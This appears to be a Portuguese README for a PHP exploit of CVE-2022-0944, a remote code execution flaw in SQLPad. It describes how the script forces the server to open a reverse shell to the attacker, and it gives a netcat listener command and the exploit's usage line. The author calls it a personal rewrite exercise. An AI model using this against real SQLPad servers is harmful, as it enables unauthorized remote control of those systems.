
CVE-2022-0944 Exploit de Execução Remota de Código
Este código PHP foi concebido para explorar uma vulnerabilidade de Execução Remota de Código (RCE) no SQLPad, relacionada ao CVE-2022-0944.
Ele funciona ao injetar código malicioso no aplicativo SQLPad, forçando-o a executar um comando do sistema que abre um shell reverso – uma conexão que concede ao atacante o controle remoto do sistema vulnerável.
sudo apt-get install php-clisudo apt-get install php-curlPara capturar a conexão do shell reverso, inicie o Netcat na máquina do atacante:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: A URL raiz do SQLPad vulnerável (ex.: http://target.com:3000)
<attacker_ip>: O endereço IP do atacante que está ouvindo a conexão reversa (mesmo IP do Netcat)
<attacker_port>: A porta na qual o atacante está ouvindo (mesma porta do Netcat)
A lógica original do exploit foi baseada neste repositório:
Meu objetivo aqui foi entender a lógica do exploit e reescrevê-la em outra linguagem de programação como um desafio pessoal.
Referência adicional: 🔗 CVE-2022-0944 – NVD